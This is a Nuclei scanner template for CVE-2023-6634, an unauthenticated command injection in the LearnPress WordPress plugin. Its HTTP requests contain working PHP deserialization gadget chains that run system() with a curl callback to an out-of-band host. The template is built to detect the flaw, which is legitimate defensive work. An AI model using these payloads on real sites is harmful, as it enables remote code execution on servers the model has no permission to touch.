61 lines
4.0 KiB
YAML
61 lines
4.0 KiB
YAML
id: CVE-2023-6634
|
|
|
|
info:
|
|
name: LearnPress < 4.2.5.8 - Remote Code Execution
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: critical
|
|
description: |
|
|
The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.
|
|
remediation: Fixed in 4.2.5.8
|
|
reference:
|
|
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-command-injection
|
|
- https://wpscan.com/vulnerability/909580f4-1306-4e61-ac7d-e7a2eb0961f8/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-6634
|
|
- https://plugins.trac.wordpress.org/changeset/3013957/learnpress
|
|
- https://www.wordfence.com/threat-intel/vulnerabilities/id/21291ed7-cdc0-4698-9ec4-8417160845ed?source=cve
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-6634
|
|
cwe-id: CWE-77
|
|
epss-score: 0.16476
|
|
epss-percentile: 0.95874
|
|
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
vendor: thimpress
|
|
product: learnpress
|
|
framework: wordpress
|
|
publicwww-query: "/wp-content/plugins/learnpress"
|
|
tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,learnpress,rce,intrusive
|
|
variables:
|
|
oast: "{{interactsh-url}}/?"
|
|
padstr: "{{randstr}}"
|
|
finalurl: "{{padding(oast,padstr,59)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |+
|
|
GET /wp-json/lp/v1/load_content_via_ajax/?callback={"class"%3a"LP_Debug","method"%3a"var_dump"}&args="{{randstr}}" HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |+
|
|
GET /wp-json/lp/v1/load_content_via_ajax/?callback={%22class%22:%22LP_Helper%22,%22method%22:%22maybe_unserialize%22}&args="O%3a13%3a\u0022WP_HTML_Token\u0022%3a2%3a{s%3a13%3a\u0022bookmark_name\u0022%3bs%3a64%3a\u0022curl+{{finalurl}}\u0022%3bs%3a10%3a\u0022on_destroy\u0022%3bs%3a6%3a\u0022system\u0022%3b}" HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Connection: close
|
|
|
|
- |+
|
|
GET /wp-json/lp/v1/load_content_via_ajax/?callback={"class":"LP_Helper","method":"maybe_unserialize"}&args="O%3a8%3a\u0022WP_Theme\u0022%3a2%3a{s%3a7%3a\u0022headers\u0022%3bO%3a13%3a\u0022WP_Block_List\u0022%3a2%3a{s%3a6%3a\u0022blocks\u0022%3ba%3a1%3a{s%3a4%3a\u0022Name\u0022%3ba%3a1%3a{s%3a9%3a\u0022blockName\u0022%3bs%3a12%3a\u0022Parent+Theme\u0022%3b}}s%3a8%3a\u0022registry\u0022%3bO%3a22%3a\u0022WP_Block_Type_Registry\u0022%3a1%3a{s%3a22%3a\u0022registered_block_types\u0022%3bO%3a8%3a\u0022WP_Theme\u0022%3a2%3a{s%3a7%3a\u0022headers\u0022%3bN%3bs%3a6%3a\u0022parent\u0022%3bO%3a22%3a\u0022WpOrg\\Requests\\Session\u0022%3a3%3a{s%3a3%3a\u0022url\u0022%3bs%3a10%3a\u0022http%3a//p%3a0\u0022%3bs%3a7%3a\u0022headers\u0022%3ba%3a1%3a{i%3a0%3bs%3a64%3a\u0022curl+{{finalurl}}\u0022%3b}s%3a7%3a\u0022options\u0022%3ba%3a1%3a{s%3a5%3a\u0022hooks\u0022%3bO%3a20%3a\u0022WpOrg\\Requests\\Hooks\u0022%3a1%3a{s%3a5%3a\u0022hooks\u0022%3ba%3a1%3a{s%3a23%3a\u0022requests.before_request\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bO%3a20%3a\u0022WpOrg\\Requests\\Hooks\u0022%3a1%3a{s%3a5%3a\u0022hooks\u0022%3ba%3a1%3a{s%3a15%3a\u0022http%3a//p%3a0/Name\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3bs%3a6%3a\u0022system\u0022%3b}}}}i%3a1%3bs%3a8%3a\u0022dispatch\u0022%3b}}}}}}}}}}s%3a6%3a\u0022parent\u0022%3bN%3b}" HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "contains_any(interactsh_protocol, 'http', 'dns')"
|
|
- "contains(body, 'Error: data content invalid!')"
|
|
- "contains(body_1, '<pre>{{randstr}}</pre>') "
|
|
- "status_code == 200"
|
|
condition: and
|
|
# digest: 4a0a00473045022100c9994c66149f4a5bf4f57eb82447c380b3f1676950538da499834183bc73a10d022003e36af3fb7e71968c37a7a3cbde7b2fd89d97f0bc0dd4827b652838616db3ab:922c64590222798bb761d5b6d8e72950 |